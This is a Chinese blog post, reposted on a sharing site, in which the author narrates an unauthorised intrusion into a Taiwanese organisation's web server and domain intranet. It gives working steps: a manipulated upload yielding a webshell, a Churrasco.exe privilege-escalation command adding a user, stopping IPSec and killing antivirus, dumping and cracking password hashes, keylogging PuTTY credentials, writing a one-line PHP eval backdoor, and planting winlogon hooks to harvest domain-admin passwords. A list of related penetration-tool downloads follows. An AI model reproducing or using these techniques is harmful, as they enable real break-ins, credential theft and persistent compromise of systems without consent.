`
zpball
  • 浏览: 917000 次
  • 性别: Icon_minigender_1
  • 来自: 北京
社区版块
存档分类
最新评论

渗透某大型域内网

阅读更多
樱花浪子   原始出处:http://blog.hacklu.net
由于平时比较忙,用了很久的VPN肉鸡飞掉了,近来正好有时间于是打开google搜索upfile.asp开始找肉鸡,来了台湾某XX站,http://xxx.xxx.tw/xx/upfile.asp,为了不必要的麻烦,我隐藏了敏感内容。直接到传asp提示错误,那么直接传了gif以后,查看上传路径发现自己重命名了,如果没有重命名的话在IIS6下百分之90以上可以拿shell了,除去目录末有执行脚本权限。最后抓包分析改上传路径,最后得到一个shell,图1。具体方法翻翻以前杂志或google找吧,一找一大堆。

  执行命令后,发现权限还比较大,能够执行一些简单命令,像net user、ipconfig /all等等。图2。不过执行添加用户的肯定是不行了,由于支持ASPX我想起来去年暴的本地提权,直接上传Churrasco.exe,我这里命名为c.exe。运行命令为:/c E:\website\wwwroot\xxx\xxup\c.exe "net user nohack nohack /add"。必须有双引号,双引号里是执行的命令。最后成功加了用户,图3。

  执行netstat -an发现3389开放,很兴奋的连接上去,却提示“无法连接远程计算机”,不应该呀,明明开着3389呢,google了下,一般开了3389无法连接的原因有:1、服务器在内网。用显示的IP来看是用公网IP的,先排除。2、做了tcp/ip筛选。执行CMD命令:cmd /c regedit -e c:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip,导出注册表里关于TCP/IP筛选的第一处,这种原因是查看导出的内容EnableSecurityFilters这个字段里dword后面的键值是否为00000000,如果为00000001就说明管理员做了tcp/ip筛选,我们只要把1改成0就行了。还有两个地方要导出,可是我导出来都是这三个word后面的键值都为00000000看来也不是这种原因。3、做了ip安全策略。执行cmd命令: cmd /c net stop policyagent 将IPSEC Services服务停了它。再连3389。还是连接不上。4、管理员设置的终端登陆权限只有指定的用户可以。这种原因应该是可以连接、无法登录。也排除。5、防火墙。在webshell执行了下tasklist,发现有几个进程比较可疑。如almon.exe、alsvc.exe、SAVAdminService.exe等。图4

  搜索下几个进程名发现是Sophos Anti-Virus(SAV)英国开发的一个杀毒软件,网上好评还不少。莫非是它搞的鬼,看看能不能直接结束掉,结果试了一下还真能结束掉,不过还是连接不上。原因不明中。因为这个网站禁止中国大陆的IP,这期间我试了反弹CMD,反弹IP是美国的一个肉鸡、端口转发等,最后我直接传了一个反弹的远程木马,在WEBSHELL执行,因为我有管理员的权限执行命令了,不过最后都没有弹出来。连http协议都没弹出来,当真是郁闷。

  既然这样还是在webshell里收集一下本机信息吧,执行net view查看有没有其他机器,结果还真有,图5,突然发现自己变笨了,我既然有这台的cmdshell权限,把这台的HASH密码跑出来以后可以连接其他机器呀。何况我这台还是个分站,而主站上面有N个分站,每个IP也都不一样。于是上传pwdump抓了HASH,由于没有彩虾表用LC5跑之。图6。


  接着对整个C段扫了一下3389,结果只有3台机器开放,图7,我拥有权限的是16x.xxx.xxx.99,扫出的一台16x.xxx.xxx.69也开放3389了,接着把这个IP拿到查旁注的网站看了下,结果不少都是分站和一些相关的站。试了一下,可以直接连接,用LC5跑出的一个密码登录,结果显示登录成功,却永久的停在这里,图8,不能继续任何操作,真晕,以前还真没遇到过。

  接着用了administrator的密码登录,这次成功了进入了桌面,执行了ipconfig /all看下大致环境,发现还有DNS服务器,如图9所示。一般DNS服务器也就是域服务器,接着我用net view /domain看了下有几个域。看来我所在的是INTRANE***这个域里面,继续用net view看了下本机所在的域约有多少台机器,如图10所示。用net time /domain探测了下时间服务器,末权限,在用经典的net group "domain admins" /domain同样是末权限,正在想办法如何进行下一步的时候看到桌面有个远端桌面的东东,打开一看里面有管理员保存成着其他机器里的IP,试了一下这个段的其他机器都可以连进去,看来管理员又是用的一卡通,如图11所示。

  加用端口扫描器扫的,这个段一个有20多台机器都开3389了,密码都可以进,不过我还末满足,这么多域呢,继续渗透吧,分析了下情况,现在172.16.1.*的IP段基本都已经搞定了,因为台湾的时间差和大陆几乎一样,为了避免和管理员“撞车”,我决定晚上再行动。到了晚上登录连上去的时候发现管理员果真登录了,有图为证,如图12所示。而且管理员在退出的时候是断开的,并末有注销,接着我开了一个NP写的终端监视脚本,管理员在登录的时候会注销我自己,运气还不错,得到了一台XP系统,接着抓HASH,破密码省略之。


   既然管理员用这台管理其他机器,那么我装一个键盘记录工具上去,把akl.exe扔上去了记录一下,一连记录了几天,什么也没记录到,在分析了下,暂时不想用CAIN嗅密码,试着用MS08067溢出,结果显示成功,在telnet的时候失败,郁闷中,图13。IPC连接试下,失败。又过了两天登录上去一看,发现记录到了putty的密码,原来还有unix系统呀,如图14、15所示。不但记录到了putty,还包括网页、信箱之类的。看来这个键盘记录安装的挺成功。接着用putty登录,图16。ls -a列了下目录,netstat -an,查了下端口,发现开了80。我对UNIX的渗透经验不是特别足,先放在一边,直接用echo "<?php @eval($_POST[cmd]);?>">index.php,写进了一个SHELL。

 
  思考一下,溢出、IPC已经试过,嗅探不得已的办法,还有一招末有试,winlogon劫持记录的工具,如图17。这东东可以记录域管理员在本机登录的时的密码,我把我已经控制的所有机器差不多每台一份都中上了这个东东。过了不到一个星期的功夫上去果然记录到了很多密码,如图18。

  记我没想到的是,其他域里面具然还有E文系统的机器,最后用其他域管理帐号登录,如图19所示。当我拿下域里的其他域机器的时候并没有太多的兴奋感觉,因为文章所有的都是很常规的技术。写出来做为文档,留给菜鸟、留给自己。
分享到:
评论

相关推荐

    域渗透.pdf

    域内渗透工具主要包括以下几种: 1. **抓取域hash密码**:通过工具如`vssown.vbs`、`vshadow.exe`、`ntdsdump.exe`、`mimikatz`等抓取域内的哈希密码。 2. **Hash注入**:利用获取到的哈希进行身份验证。 3. **读取...

    域外渗透域内思路:使用工具与技术进行域内侦察与暴力破解

    主要内容涵盖了使用VPN拨入内网,利用nbt.exe、ladon.exe、nmap等工具进行网络扫描,查找域控制器,以及使用bash和PowerShell脚本进行域用户口令暴力破解的方法。同时介绍了几种常用工具如ldapsearch、PowerView和...

    内网渗透之域渗透.pdf

    在准备对域进行渗透测试时,首先要判断当前环境是否处于域内,以及定位到域控制器的具体位置。这包括检查本机的配置信息、利用DNS查询来确定域控制器的IP地址、使用特定的命令和工具来收集网络上的活动目录信息等。...

    域渗透完全技巧.pdf

    【域渗透】是针对Windows域环境进行的一种高级攻击技术,目的是控制域控制器,从而获取整个网络的控制权。【内网横向】是指在获得初步权限后,在内网中进一步扩散影响力,【权限维持】则是指在成功入侵后保持长期的...

    关于域渗透学习1

    本知识点将介绍一些基础和进阶的域渗透技术,并对内网渗透的步骤和相关工具进行详细说明。 首先,域渗透方法包含了多种技术。比如,在低权限条件下,攻击者可能需要借助http转发或socket代理来进行内网访问。常规的...

    域内网渗透中的思路之一

    在进行内网渗透,尤其是在比较大型的网络环境下,很可能会遇到域这样一种特殊的网络环境,而在域环境下的内网渗透又将是另外一片天 地。

    域环境下的渗透

    在进行内网渗透,尤其是在比较大型的网络环境下,很可能会遇到域这样一种特殊的网络环境,而在域环境下的内网渗透又将是另外一片天地。

    全补丁环境下的域内攻防对抗.pdf

    针对域内的安全防护,很多公司还停留在打补丁以及修改密码策略的阶段,针对目前国内面对域内渗透的攻防不对等,缺乏针对域内高级威胁的自动化威胁发现的现状,我们将基于网络空间安全攻防全景知识库框架,针对在全...

    域渗透工具包

    【标题】:“域渗透工具包”是指一组专门用于在Windows操作系统环境下进行域权限提升和攻击的工具,主要包括mimikatz、psexec以及ms14-068漏洞利用工具。 【描述】:在网络安全领域,域渗透是攻击者试图获取对...

    [ 内网渗透 ] 域渗透技术实战指南(域渗透一条龙).rar

    [ 内网渗透 ] 域渗透技术实战指南(域渗透一条龙)

    mimikatz与域渗透

    Briefing How does Kerberos work in AD? Golden ticket & exploit Silver ticket & exploit Trust ticket & exploit Sid history & exploit

    内网安全攻防渗透测试实战指南.pptx

    内网安全攻防渗透测试实战指南是指在内网中进行的渗透测试实战指南,旨在帮助安全人员和渗透测试人员更好地理解内网安全攻防的原理和方法。 内网安全攻防渗透测试实战指南主要包含以下几个方面的内容: 1. 内网...

    [ 内网渗透 ] 域管定位工具.zip

    本篇将详细讲解如何利用特定的工具进行域管定位,以及这些工具在内网渗透过程中的作用。 标题提及的“[内网渗透] 域管定位工具.zip”是一个压缩包,其中包含了四个用于内网渗透和域管定位的工具:netview、Power...

    网络渗透技术关于网络渗透的资源

    网络渗透技术,也被称为“黑客攻击”,是网络安全领域的一个重要组成部分。它主要涉及对网络系统进行合法的、授权的测试,以发现潜在的安全漏洞和弱点。这个资源集合为网络编程爱好者提供了一条深入理解网络渗透的...

    超全的Web渗透自我学习资料合集(64篇).zip

    web渗透: DNS域传送漏洞 web渗透: 服务器多余端口开放 web渗透: 本地存储安全 web渗透: web服务器解析漏洞 web渗透: JavaScript注入漏洞 web渗透: CSS注入 web渗透: 会话固化漏洞 web渗透: 常见的WAF绕过方法

    074-渗透某勒索服务器.pdf

    标题中的"074-渗透某勒索服务器.pdf"表明这是一个关于网络安全的议题,特别是涉及到对勒索软件服务器的渗透测试。描述中的信息虽然没有直接的技术细节,但通过提到室友被勒索的经历,引出了一个关于网络安全防范的...

    内网渗透经典文集

    "域内网渗透中的思路之一.pdf"可能探讨了在域环境中进行渗透的特定策略,可能涵盖如何欺骗身份、滥用权限,以及如何避免被发现。 "Linux下渗透嗅探术.pdf"则可能专注于Linux系统的渗透测试,包括网络嗅探、数据包...

    关于域渗透与免杀对抗思考及其常见方式

    ### 关于域渗透与免杀对抗思考及其常见方式 #### 一、域渗透概述 **域**(Domain)是Windows网络中的一个独立运行单位,它不仅代表了一个逻辑组织单元,而且还是Internet上的逻辑组织单元。在Windows网络操作系统...

Global site tag (gtag.js) - Google Analytics